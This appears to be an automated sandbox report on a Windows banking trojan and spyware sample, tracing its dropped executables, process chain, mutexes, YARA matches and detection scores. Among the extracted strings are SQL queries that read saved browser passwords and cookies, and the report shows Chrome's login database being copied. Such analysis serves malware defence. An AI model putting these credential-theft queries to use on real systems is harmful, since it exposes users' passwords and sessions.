Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00070146
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005E1E0
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005326D
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007055E
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007457A
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00063731
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000747A9
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000527D4
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005E7E0
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005F8A8
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00070993
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000639AC
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000669EB
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007CA20
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00065BE7
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006FC4A
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005EC54
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00063CDD
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005BD53
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005DDAC
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00070DC8
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007CECE
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00055F0C
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00080FD4
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00412038
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00427161
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004212BE
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00443390
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00443391
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041A46B
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041240C
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00446566
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041D750
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004037E0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00427859
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00412818
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0040F890
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0042397B
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00409A40
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00411B63
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0047CBF0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00412C38
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00423EBF
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00424F70
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041AF0D
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000C063
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100060F0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100071F0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10009257
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10008340
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000E380
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000B3B0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100083F0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000C483
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10010590
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000B883
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100169BD
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100099E0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10010AED
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000ABA0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001EBD0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000BC57
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001EDDB
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: String function: 6FEA7EA0 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: String function: 004062CF appears 58 times
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: String function: 00445975 appears 65 times
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: String function: 0041171A appears 38 times
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: String function: 0041718C appears 41 times
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: String function: 00ED304E appears 35 times
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: String function: 00ED3370 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: String function: 01285B7A appears 128 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: String function: 01285BE3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: String function: 10082D21 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: String function: 01283AB0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: String function: 0006E0E4 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: String function: 0006EB60 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: String function: 0006E1C0 appears 52 times
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
Source: KeJ7Cl7flZ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KeJ7Cl7flZ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 002.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 002.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 002.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Setup.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KeJ7Cl7flZ.exe, 00000000.00000002.529860424.00000000074F0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.530016603.00000000075F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.530016603.00000000075F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.511285265.00000000052F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs KeJ7Cl7flZ.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: dxgidebug.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: dxgidebug.dll
Source: 00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.3310000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.3310000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: jg2_2qua.exe.0.drStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00011398709
Source: jg2_2qua.exe.26.drStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00011398709
Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@13/35@12/2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC1892 GetLastError,FormatMessageW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEA1870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01270B52 CoInitialize,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LdrInitializeThunk,CoCreateInstance,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ECF19A FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeFile created: C:\Program Files (x86)\ujvqkl7ofji6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\USERDA~1\Default\Login Data.bakJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeMutant created: \Sessions\1\BaseNamedObjects\37238328-1324242-5456786-8fdff0-67547552436675
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3568
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: sfxname
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: sfxstime
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: STARTDLG
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: 9,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: 9,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: h
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCommand line argument: q
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCommand line argument: sfxname
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCommand line argument: sfxstime
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCommand line argument: STARTDLG
Source: KeJ7Cl7flZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeSystem information queried: HandleInformation
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT signon_realm, username_value, hex(password_value) FROM logins;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT * FROM moz_cookies;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT host_key,name, value, hex(encrypted_value) FROM cookies;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: KeJ7Cl7flZ.exeVirustotal: Detection: 67%
Source: KeJ7Cl7flZ.exeReversingLabs: Detection: 79%
Source: hjjgaa.exeString found in binary or memory: 3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile read: C:\Users\user\Desktop\KeJ7Cl7flZ.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\KeJ7Cl7flZ.exe 'C:\Users\user\Desktop\KeJ7Cl7flZ.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
Source: unknownProcess created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeFile written: C:\Users\user\AppData\Local\Temp\RarSFX0\config.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: KeJ7Cl7flZ.exeStatic file information: File size 7922731 > 1048576
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KeJ7Cl7flZ.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbQ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb@ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: Setup.exe, 0000000F.00000003.467283122.0000000000846000.00000004.00000001.sdmp, SibClr.dll.15.dr
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.263071378.000000000474B000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb/ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb8 source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb$ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
